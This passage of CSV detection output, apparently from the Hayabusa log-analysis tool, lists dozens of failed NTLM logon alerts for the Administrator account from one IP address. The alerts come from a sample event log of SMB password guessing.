NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BXIEHbkrjwedeaih | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OvsKoixgEzUgAyie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TzaZe6Y4Tdfjseuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEmbuU3CAC3CecZy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kfBmqmVPd0CGVUsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Uz3TlU6yrcveM1w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z6hH6AkkgBFmeZ6u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2J1W2WhA6Pj7j5j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: soHOxnkoOn7ot0My | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4c2oWI6mRIvSVSKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKsXD8aTyaC4fBqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrzji5ucmutsZNpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BApOU105FCLwj4zn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EO50f7NfrrdwwCNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: 